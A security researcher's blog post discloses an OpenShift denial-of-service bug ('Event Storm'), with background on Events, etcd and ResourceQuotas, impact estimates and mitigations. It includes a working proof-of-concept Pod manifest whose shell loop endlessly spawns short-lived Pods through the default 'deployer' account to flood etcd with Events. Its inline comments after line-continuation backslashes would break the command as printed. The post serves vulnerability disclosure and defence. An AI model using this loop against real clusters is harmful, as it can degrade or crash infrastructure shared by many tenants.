Monday, June 22, 2026

Finding CVE-2026-10533 "Event Storm": When Security Guards Watch the Wrong Door

Throughout my career, I've always gravitated toward two things: technology infrastructure and cybersecurity. Being awarded CVE-2026-10533 was a pleasure and a privilege, as I got to contribute to the security community not through the usual red-team lenses of memory corruption, obfuscated payloads, or social engineering. Instead, this CVE was discovered by asking a much simpler question:

What happens when a tenant consumes a shared cluster resource that nobody is measuring?

Let's break this question down a bit, to understand the exploit methodology. If you're already an expert in OpenShift administration, feel free to skip the next section.

Defining the Question

In this case, what is a tenant? If you're unfamiliar with OpenShift, Kubernetes, or cloud computing in general - a tenant is simply one "user" of the (usually shared) distributed system. Therefore, when you use the cloud (e.g., you stand up an application inside AWS, GCP, etc.), you are a single tenant of the cloud. Almost always - except where you pay a premium for an exception! - you *share* the underlying compute and resources of the cloud with other users that you simply don't have access to see or interact with. You could have two people from two completely different countries and companies provision some software on the cloud and the cloud provider chooses to place their workloads right next to each other on the same physical server in the same physical datacenter for a plethora of different reasons. The biggest point to take from this is that by design, tenants are isolated from one another.

So what do we mean by shared? While tenants are supposed to be completely isolated from one another, they could end up using shared resources, like the physical server mentioned above. If that one server fails, BOTH tenants are impacted. Maintaining shared cluster and cloud resources with priority and fairness to all tenants is pretty much the entire job description of cloud administrators and operators. There is a lot to manage as you can probably imagine, but think of it akin to maintaining the roads that many people drive on, the sewage systems that many houses use, the electricity grid tied to many endpoints, etc. If a cluster admin inadvertently impacts a shared resource, that is a bad day at work for that guy. If a *tenant* can intentionally impact shared resources, and step on other tenants, that is when the activity crosses the line from accidental incident to malicious attack.

Why do I say nobody? Well, cluster admins can and should be watching their shared cluster resources that all tenants use. However, there are many things that tenants technically "share", including but not limited to:

  • Underlying host CPU
  • Underlying host memory
  • Underlying host disk space
  • Underlying host network
  • Network bandwidth
  • Cluster control plane API calls
  • DNS nameservers
  • L3 network
  • L1 data cables
  • Server rack PDUs
  • Datacenter aisle
  • Datacenter HVAC
  • Datacenter electricity allocation
  • Regional power grid
and much more. Multiply that by however many nodes and clusters an administrator has to watch, and it quickly becomes cumbersome, not to mention that it spans multiple teams and departments within an organization. To handle all of this, many cloud administrators rely on automated monitoring and alerting. With the question I posed, I'm looking for something that flies under the radar of those accounting systems.

Lastly, what do I mean by measuring? All the shared resources I listed above have different thresholds for good and bad states. If I say that a single physical server is utilizing 20% of its CPU capacity, that has different implications than if I say a single physical server is utilizing 20% of the regional power grid! All systems, and all resources in those systems, require different measurements and different alerting thresholds. Again, I want a resource that nothing is measuring and that trips no alert.

I'm looking for a door with no security guards watching it.

Enter Events

I have personally dubbed CVE-2026-10533 "Event Storm". What do I mean by "Events"? Events in Kubernetes are simply metadata objects that are created and logged whenever something interesting happens in a cluster, such as:
  • A Pod is created
  • A container image is pulled
  • A container starts
  • A scheduling decision occurs
  • A readiness probe fails
  • A Pod completes successfully
All of these actions generate an Event object that logs the timestamp, description of what happened, and references to the tenant and workload that generated the Event. Events are extremely useful for troubleshooting because they provide a timeline of what happened inside the cluster. 

The downside is that Events are not free.

Each Event is stored in etcd, the distributed key-value database of Kubernetes that serves as the cluster's source of truth. etcd is arguably the most critical component in the cluster. It stores information about Pods, Deployments, Nodes, Services, Operators, Images, API objects, and countless other pieces of cluster state. If etcd becomes unhealthy, the rest of the cluster quickly follows. A Kubernetes cluster is ultimately a distributed system whose state is coordinated through etcd. Anything capable of overwhelming etcd therefore has the potential to impact the entire cluster.
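To put a number on how many Events a cluster is holding, and who owns them, a per-namespace tally is a reasonable first look. The following is a minimal sketch, not part of the original proof-of-concept: the function name count_events_by_namespace is hypothetical, and it assumes the first column of `oc get events -A --no-headers` output is the namespace.

```shell
#!/bin/sh
# Tally Events per namespace from tabular `oc get events -A --no-headers` output.
# Assumption: with -A, the first whitespace-separated column is the namespace.
count_events_by_namespace() {
  # Count rows per namespace, then print "<count> <namespace>", largest first.
  awk 'NF { count[$1]++ } END { for (ns in count) print count[ns], ns }' | sort -rn
}

# Usage against a live cluster (requires permission to list Events cluster-wide):
#   oc get events -A --no-headers | count_events_by_namespace | head
```

A namespace whose count dwarfs the others is a good place to start asking questions.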

Normal Guardrails

There are ways to limit the overuse of shared resources in Kubernetes and keep a single tenant from getting too greedy, specifically through objects known as ResourceQuotas. Most enterprise Kubernetes and OpenShift clusters use ResourceQuotas to prevent a single tenant from consuming excessive resources. A typical tenant's provisioning space (called a Namespace) might be limited to:
  • 10 Pods
  • 1 CPU
  • 10 GiB of memory
The assumption is straightforward: if a tenant can only run a small number of Pods with limited CPU and memory, they should not be able to negatively impact the cluster as a whole. This assumption is generally correct when the resource being consumed is CPU, memory, or storage. The problem is that ResourceQuotas are only capable of measuring the resources they are configured to measure. 

Events are not one of these resources.
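For reference, the example limits above could be expressed as a ResourceQuota along the following lines. This is a sketch under assumptions: the object name tenant-quota and the helper function print_tenant_quota are hypothetical, and a real enterprise quota will likely carry more entries.

```shell
#!/bin/sh
# Print a ResourceQuota manifest matching the example limits in the text.
# "tenant-quota" is a hypothetical placeholder name.
print_tenant_quota() {
  cat <<'EOF'
apiVersion: v1
kind: ResourceQuota
metadata:
  name: tenant-quota
spec:
  hard:
    pods: "10"
    requests.cpu: "1"
    requests.memory: 10Gi
EOF
}

# Usage (namespace is a placeholder):
#   print_tenant_quota | oc apply -n <namespace> -f -
```

Everything under spec.hard in this example is about Pods, CPU, and memory. Nothing in it refers to Events.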

So, is there a way to take advantage of the fact that nobody is measuring Events as a shared cluster resource, from a single tenant? Glad you asked, because that is what CVE-2026-10533 is all about.

Enter the Exploit



The beautiful thing about this particular exploit is that no cluster admin permissions are required. No elevated permissions are required. No cross-namespace access is required. No quota modifications are required.

The only permission required is the ability to *deploy* a single Pod. In fact, you do not even need the ability to run that Pod yourself! Why does that distinction matter? Maybe the interns on your Software Development team can trigger deployment pipelines because the enterprise deployment automation takes care of everything. Perhaps runtime access is locked down to your sysadmins, or even to non-human ServiceAccounts. But the simple, repeatable, no-login deployment pipeline trigger is just a click away.

I hear you: "enough already, give me the exploit". Fine.

The exploit works thusly: by using a default ServiceAccount that comes standard with every new OpenShift project/namespace (account name: "deployer") to create short-lived Pods within allowed CPU/memory ResourceQuotas, it is possible to generate ~130,000 Events in under three hours from a single namespace - enough to severely degrade API server performance on new OpenShift clusters, and completely topple clusters older than a couple of in-place major version upgrades.

We simply create a malicious DoS control Pod that continuously spawns new extremely short-lived Pods. This continuous spawning of new Pods and their subsequent completion generates many Events and API server requests. 

Even with a typical ResourceQuota found in enterprises of:
pods: 0/10
requests.cpu: 0/1
requests.memory: 0/10Gi
this exploit bypasses that in the following ways:

  • Number of Pods: Each child Pod sleeps for a very short duration (< 150ms) on start. Additionally, with restartPolicy: Never set, the Pod is "forgotten" by the API server once it completes. "Completed" Pods do not count toward the overall project Pod count unless a very specific configuration setting is enabled (and most organizations would not want it enabled anyway, as it would block new CronJob Pods from starting).
  • CPU request: Each child Pod requests 100m of CPU, and is forgotten upon completion.
  • Memory request: Each child Pod requests 128Mi of memory, and is forgotten upon completion.
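Put differently, the quota only caps how many child Pods can be alive at the same moment, not how many can be created over time. A quick back-of-the-envelope sketch, assuming the control Pod counts against the same quota with the requests shown in this post (100m CPU, 300Mi memory), and using the hypothetical function name child_pod_ceiling:

```shell
#!/bin/sh
# How many child Pods fit inside the example quota at any one moment?
child_pod_ceiling() {
  quota_pods=10; quota_cpu_m=1000; quota_mem_mi=10240   # pods: 10, cpu: 1, memory: 10Gi
  ctl_cpu_m=100; ctl_mem_mi=300                         # control Pod requests
  child_cpu_m=100; child_mem_mi=128                     # child Pod requests

  by_pods=$(( quota_pods - 1 ))                         # one slot is the control Pod
  by_cpu=$(( (quota_cpu_m - ctl_cpu_m) / child_cpu_m ))
  by_mem=$(( (quota_mem_mi - ctl_mem_mi) / child_mem_mi ))

  # The tightest of the three dimensions is the real ceiling.
  ceiling=$by_pods
  if [ "$by_cpu" -lt "$ceiling" ]; then ceiling=$by_cpu; fi
  if [ "$by_mem" -lt "$ceiling" ]; then ceiling=$by_mem; fi
  echo "pods=$by_pods cpu=$by_cpu memory=$by_mem ceiling=$ceiling"
}
child_pod_ceiling
```

Nine children at a time is all the quota enforces. Because each one completes in a fraction of a second and frees its slot, the total number of Pods (and Events) created per hour is bounded only by how fast the loop can run.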

Exploit Code

The following Bash/YAML code demonstrates the malicious DoS control Pod with the highest clarity, but would be much slower than the same exploit in Go. The Go-based exploit can be found on my GitHub. The below simply highlights the exploit methodology:

apiVersion: v1
kind: Pod
metadata:
  name: dos-control-pod
spec:
  restartPolicy: Never
  serviceAccountName: deployer # this allows the Pod to create Pods
  containers:
    - name: dos
      image: openshift4:4.16.36-x86_64-cli # an OC CLI image, or put the OC CLI binary into any other image
      command:
        - /bin/sh
        - -c
        - |
          while true; do
            oc run --wait=false \ # Do not wait for a response from the API server
            new-$(date +%s%N) \ # use nanosecond timestamp for Pod name uniqueness
            --restart=Never \ # Force the Pod to complete and the API server to forget about it
            --image=any-image \ # can be any image, just need to sleep
            --overrides='{"spec":{"containers":[{"name":"dos","image":"any-image","resources":{"requests":{"cpu":"100m","memory":"128Mi"},"limits":{"cpu":"100m","memory":"128Mi"}}}]}}'
            done
      resources:
        limits:
          cpu: 100m
          memory: 300Mi
        requests:
          cpu: 100m
          memory: 300Mi

Exploit Impact

One Go-based DoS control Pod in one Namespace generates about 43,000 Events/hour with all associated guardrails in place. Since the Event TTL is 3 hours, this exploit accumulates ~130,000 Events from one Namespace before the cluster starts to clean them up. I have personal experience at a large enterprise with older OpenShift clusters that degraded and lost full availability at around 150,000-200,000 Event objects across ALL tenant Namespaces, meaning this exploit alone can account for as much as ~86% of a cluster's total Event capacity (130,000 of 150,000).
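The arithmetic behind those figures is simple enough to check by hand. A minimal sketch using only the numbers quoted above (the function name event_storm_share is hypothetical):

```shell
#!/bin/sh
# Steady-state Event count for one namespace, from the figures quoted in the text.
event_storm_share() {
  rate_per_hour=43000   # Events/hour from one control Pod
  ttl_hours=3           # Event TTL before cleanup begins
  steady=$(( rate_per_hour * ttl_hours ))
  # Compare against both ends of the observed failure range (all namespaces).
  for ceiling in 150000 200000; do
    echo "$steady of $ceiling = $(( steady * 100 / ceiling ))%"
  done
}
event_storm_share
```

With integer division this prints 86% against the 150,000 figure and 64% against the 200,000 figure, so the share depends heavily on where a given cluster's breaking point sits.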

The 43,000 Events/hour count is from a quick proof-of-concept. Dedicated time, research, and effort to create a highly-targeted and crafted exploit (say one that works around the API server's priority and fairness queue, or some low-level kernel-calling of the on-Node container creation engine, whatever) could raise this count significantly.

Also note that if an attacker can push control Pods to multiple namespaces, the impact multiplies accordingly.

Consideration for Long-Running/Aged Clusters

CVE-2026-10533 received a CVSS score of 5.0 Moderate, which isn't enough to make nation-state adversaries get out of bed to start exploiting. This is because Red Hat used fresh, small clusters in its own testing of the exploit. While they confirmed it does degrade API server performance, they never saw a full cluster failure.

However, real-world OpenShift clusters are much different. I've seen clusters as old as 6 years that received in-place cluster version upgrades the entire time. I've seen clusters of 200+ Nodes, with 50,000 Pods on them. I've seen clusters with 40+ operators (the software kind, not human kind), all tracking and managing state of various components independently, and relying on etcd for any kind of information. 

Now imagine you have a four-year-old cluster of 100+ Nodes, 20,000 Pods, maybe 25 operators, and 600 different Namespaces/tenants. That is a lot of objects. Old MachineConfigs and certs from cluster versions long past may still be lingering around. User and Group objects to handle all the developer logins, RBAC configs flying around, Node states switching from Healthy to NodeDiskPressure and back again, images being pulled, Pods completing runs, the list goes on. etcd is tracking all of this, and it only gets more bogged down the more you add to the cluster.

While you can have a healthy cluster with all of the above objects being stored and tracked and modified (trust me, that is a full time job in and of itself), imagine if I cut your etcd capacity by 86% through exploiting CVE-2026-10533. Your cluster will crash.

Now, I'm not telling would-be attackers to go try Event Storm on clusters that have been around for a while. All I'm saying is: don't automatically scoff at the Moderate score it received.

Weathering the Storm

A few mitigations exist for CVE-2026-10533, but they come with trade-offs.
  1. Turn off the "DeploymentConfig" capability at cluster build time. This prevents the default "deployer" ServiceAccount from being created, so an attacker would need the ability both to deploy a Pod and to run a Pod that can itself create Pods (the DoS control Pod). The deployer account takes care of creating Pods for us, so without it the attacker needs more permissions. However, this additional privilege may not be too difficult to acquire if they already have an account that can deploy a Pod: simply running the control Pod as that initial deploying account may work immediately.
  2. Setting ResourceQuota/v1/spec.scopes to NotTerminating and applying it to all namespaces in a cluster would prevent this exploit, and allow ResourceQuotas to track Completed Pods. There is a very large trade-off, however: a normal CronJob object spawns "Job" Pods, which of course do their job and then Complete. If you only allow 10 Completed Pods per namespace, a tenant could only run 10 Jobs before having to clean up (or else the next Job would fail). This is more than likely not something a Platform Engineering team would want to enable, as it would impose a lot of restrictions on developers and users of OpenShift.
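Before weighing either mitigation, it helps to know which namespaces are exposed in the first place. One way to check, sketched below, is to ask the API server whether a namespace's "deployer" ServiceAccount is allowed to create Pods. The function name deployer_can_create_pods is hypothetical, and the sketch assumes the caller holds impersonation rights (needed for --as).

```shell
#!/bin/sh
# Ask the API server whether a namespace's "deployer" ServiceAccount may create Pods.
# Assumption: the caller is permitted to impersonate ServiceAccounts (required by --as).
deployer_can_create_pods() {
  ns="$1"
  oc auth can-i create pods -n "$ns" --as "system:serviceaccount:${ns}:deployer"
}

# Usage (my-project is a placeholder namespace); prints "yes" or "no":
#   deployer_can_create_pods my-project
```

Looping this over every namespace gives a rough inventory of where mitigation 1 would actually change anything.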

Acknowledgements

All in all, this has been a fun process of finding a CVE. I am grateful to my peers and management at my old role at Citibank, N.A. who gave me the opportunity to do some threat modeling of our OpenShift clusters. I am grateful to Red Hat for awarding the CVE, and to my friends and family for all the support over this long disclosure process.


